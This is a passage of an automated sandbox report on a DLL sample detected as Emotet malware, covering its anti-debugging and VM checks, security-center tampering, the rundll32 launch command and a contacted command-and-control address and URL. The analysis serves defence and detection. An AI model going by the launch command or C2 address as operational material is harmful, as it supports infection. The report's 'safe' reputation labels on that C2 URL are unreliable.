                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 4736Thread sleep time: -90000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE2C8 FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: Amcache.hve.22.drBinary or memory string: VMware
                      Source: Amcache.hve.22.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: WerFault.exe, 00000018.00000003.618456915.0000000004C00000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.620041748.0000000004C02000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWiK
                      Source: Amcache.hve.22.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.22.drBinary or memory string: VMware, Inc.
                      Source: WerFault.exe, 00000018.00000002.620008004.0000000004BD2000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.618494839.0000000004BD2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                      Source: svchost.exe, 0000001C.00000002.693021814.00000214D4681000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWpj
                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.22.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.22.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.22.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 00000018.00000003.618456915.0000000004C00000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.620041748.0000000004C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.693041446.00000214D4689000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.693406330.00000214D46EB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.22.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.22.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.22.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.22.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                      Source: Amcache.hve.22.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: WerFault.exe, 00000018.00000003.616852484.0000000004BD1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.22.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECDE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD1290 GetMagnificationLensCtxInformation,GetProcessHeap,GetMagnificationLensCtxInformation,HeapAlloc,HeapFree,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011107D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE9990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEEC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF02CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE9920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE9920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008707D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE9990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECEEC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF02CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE9920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE9920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007807D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01111591 LdrInitializeThunk,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECEA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECEAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.63.5.129 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316
                      Source: svchost.exe, 00000001.00000002.814657339.00000159B5A60000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.569777163.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.600588969.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.599262292.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.578206765.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 0000001A.00000002.816539313.0000000003450000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: svchost.exe, 00000001.00000002.814657339.00000159B5A60000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.569777163.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.600588969.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.599262292.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.578206765.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 0000001A.00000002.816539313.0000000003450000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: svchost.exe, 00000001.00000002.814657339.00000159B5A60000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.569777163.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.600588969.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.599262292.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.578206765.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 0000001A.00000002.816539313.0000000003450000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: svchost.exe, 00000001.00000002.814657339.00000159B5A60000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.569777163.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.600588969.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.599262292.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.578206765.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 0000001A.00000002.816539313.0000000003450000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEA584 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEA755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: Amcache.hve.LOG1.22.dr, Amcache.hve.22.drBinary or memory string: c:\users\user\desktop\procexp.exe
                      Source: Amcache.hve.22.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: svchost.exe, 00000000.00000002.813823605.0000020AC5040000.00000004.00000001.sdmpBinary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000000.00000002.813897976.0000020AC5102000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.LOG1.22.dr, Amcache.hve.22.drBinary or memory string: procexp.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 13.2.rundll32.exe.3332418.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.770000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.860000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.e12148.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.1100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c920a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.e12148.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.11e3b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.c50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c920a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.932160.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.35a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.9a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.11e3b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.35a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.770000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.3332418.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.1100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.860000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.932160.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.c50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.562952810.0000000000DFA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.600312961.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.574084916.0000000000C7A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.577604622.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.599173428.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.599105151.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.575882015.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.522035243.0000000000785000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.600444475.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.568041715.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.765865481.0000000000C4D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.660358890.000000000331A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.562904188.0000000000C50000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.566098694.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.563477731.000000000091A000.00000004.00000020.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection112Masquerading21OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerSecurity Software Discovery51SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsProcess Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemSystem Information Discovery24Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 532312 Sample: efELSMI5R4 Startdate: 02/12/2021 Architecture: WINDOWS Score: 88 52 Sigma detected: Emotet RunDLL32 Process Creation 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Yara detected Emotet 2->56 8 loaddll32.exe 1 2->8         started        10 svchost.exe 2->10         started        13 svchost.exe 3 8 2->13         started        15 5 other processes 2->15 process3 signatures4 17 rundll32.exe 2 8->17         started        20 cmd.exe 1 8->20         started        22 rundll32.exe 8->22         started        30 3 other processes 8->30 58 Changes security center settings (notifications, updates, antivirus, firewall) 10->58 24 MpCmdRun.exe 1 10->24         started        26 WerFault.exe 13->26         started        28 WerFault.exe 13->28         started        process5 signatures6 50 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->50 32 rundll32.exe 17->32         started        34 rundll32.exe 20->34         started        36 rundll32.exe 22->36         started        38 conhost.exe 24->38         started        40 rundll32.exe 30->40         started        process7 process8 42 rundll32.exe 32->42         started        46 rundll32.exe 34->46         started        dnsIp9 48 45.63.5.129, 443, 49815 AS-CHOOPAUS United States 42->48 60 System process connects to network (likely due to code injection or exploit) 42->60 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      efELSMI5R4.dll20%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.2.rundll32.exe.c30000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      5.2.rundll32.exe.860000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.0.loaddll32.exe.1100000.9.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.0.loaddll32.exe.1100000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.c50000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.0.loaddll32.exe.1100000.6.unpack100%AviraHEUR/AGEN.1110387Download File
                      26.2.rundll32.exe.9a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      6.2.rundll32.exe.770000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.35a0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.0.loaddll32.exe.1100000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.2.loaddll32.exe.1100000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://45.63.5.129/fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ0%Avira URL Cloudsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://45.63.5.129/fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.ver)svchost.exe, 0000001C.00000002.693406330.00000214D46EB000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://upx.sf.netAmcache.hve.22.drfalse
                        		high
                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001C.00000003.673502580.00000214D5202000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673473376.00000214D4D91000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673436832.00000214D4DA8000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673407994.00000214D4DA8000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
